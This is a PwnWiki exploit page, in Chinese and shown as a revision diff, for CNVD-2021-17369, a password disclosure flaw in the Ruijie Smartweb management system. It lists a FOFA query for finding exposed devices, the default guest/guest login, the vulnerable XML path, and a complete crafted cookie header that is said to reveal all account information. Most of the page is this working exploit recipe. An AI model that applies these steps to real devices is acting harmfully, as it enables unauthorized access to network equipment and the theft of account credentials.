Difference between revisions of "CNVD-2021-17369 銳捷Smartweb管理系統 密碼信息洩露漏洞"

From PwnWiki
(Created page with "<languages /> ==FOFA== <pre> title="无线smartWeb--登录页面" </pre> <translate> ==默認guest密碼== </translate> <pre> guest/guest </pre> <translate> ==漏洞位...")
 
(修改错别字)
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 
<languages  />
 
<languages  />
 
 
==FOFA==
 
==FOFA==
 
<pre>
 
<pre>
 
title="无线smartWeb--登录页面"
 
title="无线smartWeb--登录页面"
 
</pre>
 
</pre>
 
 
<translate>
 
<translate>
==默認guest密碼==
+
==默認guest密碼== <!--T:1-->
 
</translate>
 
</translate>
 
 
<pre>
 
<pre>
 
guest/guest
 
guest/guest
Line 16: Line 13:
  
 
<translate>
 
<translate>
==漏洞位置==
+
==漏洞位置== <!--T:2-->
 
</translate>
 
</translate>
 
 
<pre>
 
<pre>
 
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
 
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
Line 25: Line 21:
  
 
<translate>
 
<translate>
==漏洞利用==
+
==漏洞利用== <!--T:3-->
 
</translate>
 
</translate>
 
 
<translate>
 
<translate>
Cookice添加以下內容
+
<!--T:4-->
 +
Cookie添加以下內容
 
</translate>
 
</translate>
 
<pre>
 
<pre>
Line 37: Line 33:
  
 
<translate>
 
<translate>
 +
<!--T:5-->
 
可以獲取所有賬戶信息
 
可以獲取所有賬戶信息
 
</translate>
 
</translate>
Line 42: Line 39:
  
 
<translate>
 
<translate>
==參考==
+
==參考== <!--T:6-->
 
</translate>
 
</translate>
 
https://mp.weixin.qq.com/s/EICYTqRWDRB8OfXKHxCBfQ
 
https://mp.weixin.qq.com/s/EICYTqRWDRB8OfXKHxCBfQ

Latest revision as of 15:07, 12 July 2021

Other languages:

FOFA

title="无线smartWeb--登录页面"

默認guest密碼

guest/guest


漏洞位置

http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml


漏洞利用

Cookie添加以下內容

Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest


可以獲取所有賬戶信息